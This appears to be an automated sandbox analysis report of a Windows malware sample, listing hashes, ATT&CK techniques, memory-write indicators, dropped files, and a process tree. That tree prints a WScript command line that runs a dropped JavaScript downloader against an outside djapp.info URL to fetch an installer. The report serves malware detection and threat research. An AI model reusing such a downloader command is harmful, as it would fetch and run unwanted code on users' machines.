95646abda67b4ffa3e175cf767fc91245b7c40a07564afa1d8d255fb1dd69656

Analysis

max time kernel
120s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
10-05-2024 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe
Size

184KB
MD5

2cd5121eb08d4bb5dc4b9974d2c24de1
SHA1

6813a07bf84ea680d0fbf269fcff0ecf572e1b5c
SHA256

95646abda67b4ffa3e175cf767fc91245b7c40a07564afa1d8d255fb1dd69656
SHA512

4858a4f9551029761478350f997b434e75dc5b9a7952dba3c6afb76d7d24cefa2f9c754dedbefa4dfb13dee6589b38c947677ba361fb46fa9c950728682ebc4f
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3u:/7BSH8zUB+nGESaaRvoB7FJNndnL

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2416	WScript.exe
8	2416	WScript.exe
10	2416	WScript.exe
12	1732	WScript.exe
13	1732	WScript.exe
15	1468	WScript.exe
16	1468	WScript.exe
18	2392	WScript.exe
19	2392	WScript.exe
21	2768	WScript.exe
22	2768	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 2416	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	28
PID 1932 wrote to memory of 2416	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	28
PID 1932 wrote to memory of 2416	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	28
PID 1932 wrote to memory of 2416	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	28
PID 1932 wrote to memory of 1732	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	30
PID 1932 wrote to memory of 1732	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	30
PID 1932 wrote to memory of 1732	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	30
PID 1932 wrote to memory of 1732	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	30
PID 1932 wrote to memory of 1468	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	32
PID 1932 wrote to memory of 1468	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	32
PID 1932 wrote to memory of 1468	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	32
PID 1932 wrote to memory of 1468	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	32
PID 1932 wrote to memory of 2392	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	34
PID 1932 wrote to memory of 2392	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	34
PID 1932 wrote to memory of 2392	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	34
PID 1932 wrote to memory of 2392	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	34
PID 1932 wrote to memory of 2768	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	36
PID 1932 wrote to memory of 2768	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	36
PID 1932 wrote to memory of 2768	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	36
PID 1932 wrote to memory of 2768	1932	2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\2cd5121eb08d4bb5dc4b9974d2c24de1_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1E98.js" http://www.djapp.info/?domain=poiPYmxiqF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1E98.exe
  2⤵
  - Blocklisted process makes network request
  PID:2416
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1E98.js" http://www.djapp.info/?domain=poiPYmxiqF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1E98.exe
  2⤵
  - Blocklisted process makes network request
  PID:1732
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1E98.js" http://www.djapp.info/?domain=poiPYmxiqF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1E98.exe
  2⤵
  - Blocklisted process makes network request
  PID:1468
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1E98.js" http://www.djapp.info/?domain=poiPYmxiqF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1E98.exe
  2⤵
  - Blocklisted process makes network request
  PID:2392
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1E98.js" http://www.djapp.info/?domain=poiPYmxiqF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1E98.exe
  2⤵
  - Blocklisted process makes network request
  PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
b6e71adf7324685d8f60c97bdb99f892

SHA1
ac45dd58c3dfb5d68ffdbc27817f1e5ad5720830

SHA256
40a181e9a8b85b862afc89a604eb290be3b5cd68937feb9ccfc467d3589e8e5c

SHA512
f864a712e300632059c0678ff5f54412fc7f7a1db02e469bcdc77be452886b55cd3d08ff51076278d1a21b091b2fc459e30c53b0d8e8855dbfefa59f0ee4cea9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
3a2b263f218503eedc7bf17a941f2324

SHA1
fbbb274b53b83073bd76f39601e2762ad6b0ab57

SHA256
599cd2311c04d7c18bab6cf1f07fe55f495f88feb4a9959fff1b2f2b3ef55e2b

SHA512
eb4874aa4e872a8b4339ffc34363577a9185c7d628c63ba3df730e0297a7370643e18e7ff42ed8ffe6e5f9879e0c1427483ae1ddcc9eeb1b81dd442a7c338970

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
64f26ae942c5512e30a4cc8478304900

SHA1
ec1d0a4fe402c7c6a691871ebbacd48f7196f8ef

SHA256
5a6dcec65fec02e910f48cd3d8b6a049d1b5bfae406fa3a984fa3ef43117b11b

SHA512
272676e78fec0bfcb3cae395ac6eb4db4effdb2217e6320c005044e52e3c023948426128694f3f8f8ea933b608554d066948158e671a25cd1a0b20429cf4e379

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
d706d0f6019376e1ce87b4897dcd782d

SHA1
094c1e8543a1b4151cd5ff89c6ef7b7045cce63b

SHA256
e9f71204ce42f161295882cc5819101e96e12c69dbf59a92022d457504d7ba39

SHA512
37b99176f75018fee502ec1ec95e35189c4e3bf375d9945c9efe7e2547d93b6c7addbd228f410149e8c05461170a52b0d2a2d8c68d7d78143e9730b0da171b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
6KB

MD5
c846a897d8c020564d80df2219f9d23a

SHA1
e30db5e99d16356c21243a9a555288951a21ca90

SHA256
bd8c05ea2d957f08aeedb28c4d20d3ec1d377a71eef679120ed9f0d50613474a

SHA512
3408c6d62a9219aba5cb3be40db750e5d28aa6729856fa1749708c3dd82a66ed2c45ab6b6abb7f08510daf8f5c756117b26db2c741d53610044a22f3e6933cf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
6KB

MD5
19e2581c9e2ce5f71ed58272b663fb89

SHA1
85495e018197af11b75e4b84d4287909ad0ed2eb

SHA256
2c99955698bea77d0d38dae006ac608c206c15fb61ad2e2610b6794178b3901b

SHA512
a11f0232e08ec15d5a8fbc3ac924387d39647b20b7a07c997a5c4df8578b4e70f9349aa204cb030aa0c36f88edc6a5b8c8f010f2f8941677f32507b1ff4c2e8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
8cc3e419a1dbbecb0907ac252f3e1d91

SHA1
9b0463ac1e0d911904969ead1b1f2892492f7645

SHA256
4222959e8ea19296bfd5d15c89fa1210b45d329d07d1085d8f03050ce6c6c959

SHA512
c492495da603b5efeb9ff9e5e84cfe0a93bf22fd92927aed0ff563753e1912cb2be32d46dcaada7335a421e8053055c45452ad1dc7fec7bef3520f297202872c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
c0368fbb80d9335a21798886e4f51013

SHA1
16013ffdbb06386b683f0b1bf88cde59325a0585

SHA256
ce7ca60d2259e65011dba9c4bd2a399704b4def29ca5ef96fd6413a5a856bf07

SHA512
1edd4d3a6903d337232fa5eb2f1676c67f03299e856009448e0b18b5596c49ecd20c8309331299129d43f227b13f2da01d37fd2388178afc5875b54f2459d854

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4DF1.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6643.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1E98.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\C3JWUT1X.txt

Filesize
177B

MD5
882657fb8b0036897521899dd3d0c190

SHA1
63c5498bdcf4f1fc8654df4e0845226cd812700a

SHA256
9d3230992b381bbde1ea95f4b03c635fde4a400563cd5c391af789511e2dc246

SHA512
1ad6d1bdd86a0a7433ca5e075ded69ec089e9f248b015d42ffea7ebd72527f5da9a267aa9bb862123950031cb32f22e99482aee1c60296b811e96699469d98a5

Download Submit